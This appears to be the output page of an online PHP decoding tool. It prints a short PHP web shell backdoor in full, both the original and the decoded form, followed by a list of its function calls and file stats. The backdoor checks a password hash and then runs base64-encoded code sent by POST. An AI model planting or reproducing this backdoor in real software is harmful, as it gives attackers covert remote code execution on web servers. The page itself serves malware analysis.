Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_POST["qwer"]) && md5(md5(md5($_GET['a'])))=='1ebee2c29dc49448777fe8c4c576..

Decoded Output download

<?php if(isset($_POST["qwer"]) && md5(md5(md5($_GET['a'])))=='1ebee2c29dc49448777fe8c4c576686f'){@eval(base64_decode($_POST["qwer"]));exit;} ?>

Did this file decode correctly?

Original Code

<?php if(isset($_POST["qwer"]) && md5(md5(md5($_GET['a'])))=='1ebee2c29dc49448777fe8c4c576686f'){@eval(base64_decode($_POST["qwer"]));exit;}

Function Calls

md5 3
base64_decode 1

Variables

None

Stats

MD5 5f9c31811e4add9faeae267e863a1e96
Eval Count 0
Decode Time 95 ms